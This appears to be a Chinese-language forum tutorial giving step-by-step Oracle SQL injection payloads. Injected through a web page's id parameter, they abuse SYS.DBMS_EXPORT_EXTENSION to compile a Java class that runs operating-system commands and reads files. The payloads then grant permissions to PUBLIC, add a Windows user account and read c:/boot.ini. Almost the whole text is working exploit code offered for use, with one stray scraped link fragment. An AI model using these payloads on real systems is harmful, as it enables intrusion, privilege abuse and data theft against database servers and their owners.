Oracle辅导:oracleSQL注入命令总结
以下的演示都是在web上的sql plus执行的,在web注入时 把select SYS.DBMS_EXPORT_EXTENSION.....改成/xxx.jsp?id=1 and ''1''''a''||(select SYS.DBMS_EXPORT_EXTENSION.....)
的形式即可。(用" ''a''|| "是为了让语句返回true值)
语句有点长,可能要用post提交。
以下是各个步骤:
1.创建包
通过注入 SYS.DBMS_EXPORT_EXTENSION 函数,在oracle上创建Java包LinxUtil,里面两个函数,runCMD用于执行系统命令,readFile用于读取文件:
/xxx.jsp?id=1 and ''1''''a''||(
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES(''FOO'',''BAR'',''DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''''''
create or replace and compile java source named "LinxUtil" as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(
new InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}public static String readFile(String filename){try{BufferedReader myReader= new BufferedReader(new FileReader(filename)); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}
}'''''''';END;'''';END;--'',''SYS'',0,''1'',0) from dual
)
------------------------
如果url有长度限制,可以把readFile()函数块去掉,即:
/xxx.jsp?id=1 and ''1''''a''||(
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES(''FOO'',''BAR'',''DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''''''
create or replace and compile java source named "LinxUtil" as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(
new InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}
}'''''''';END;'''';END;--'',''SYS'',0,''1'',0) from dual
)
同时把后面步骤 linuxidc.com">www.linuxidc.com提到的 对readFile()的处理语句去掉。
------------------------------
2.赋Java权限
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES(''FOO'',''BAR'',''DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''''''begin dbms_java.grant_permission( ''''''''''''''''PUBLIC'''''''''''''''', ''''''''''''''''SYS:java.io.FilePermission'''''''''''''''', '''''''''''''''''''''''''''''''', ''''''''''''''''execute'''''''''''''''' );end;'''''''';END;'''';END;--'',''SYS'',0,''1'',0) from dual
3.创建函数
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES(''FOO'',''BAR'',''DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''''''
create or replace function LinxRunCMD(p_cmd in varchar2) return varchar2 as language java name ''''''''''''''''LinxUtil.runCMD(java.lang.String) return String''''''''''''''''; '''''''';END;'''';END;--'',''SYS'',0,''1'',0) from dual
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES(''FOO'',''BAR'',''DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''''''
create or replace function LinxReadFile(filename in varchar2) return varchar2 as language java name ''''''''''''''''LinxUtil.readFile(java.lang.String) return String''''''''''''''''; '''''''';END;'''';END;--'',''SYS'',0,''1'',0) from dual
4.赋public执行函数的权限
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES(''FOO'',''BAR'',''DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''''''grant all on LinxRunCMD to public'''''''';END;'''';END;--'',''SYS'',0,''1'',0) from dual
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES(''FOO'',''BAR'',''DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''''''grant all on LinxReadFile to public'''''''';END;'''';END;--'',''SYS'',0,''1'',0) from dual
5.测试上面的几步是否成功
and ''1''''11''||(
select OBJECT_ID from all_objects where object_name =''LINXRUNCMD''
)
and ''1''(
select OBJECT_ID from all_objects where object_name =''LINXREADFILE''
)
6.执行命令:
/xxx.jsp?id=1 and ''1''(
select sys.LinxRunCMD(''cmd /c net user linx /add'') from dual
)
/xxx.jsp?id=1 and ''1''(
select sys.LinxReadFile(''c:/boot.ini'') from dual
)
注意sys.LinxReadFile()返回的是varchar类型,不能用"and 1" 代替 "and ''1''"。
页:
[1]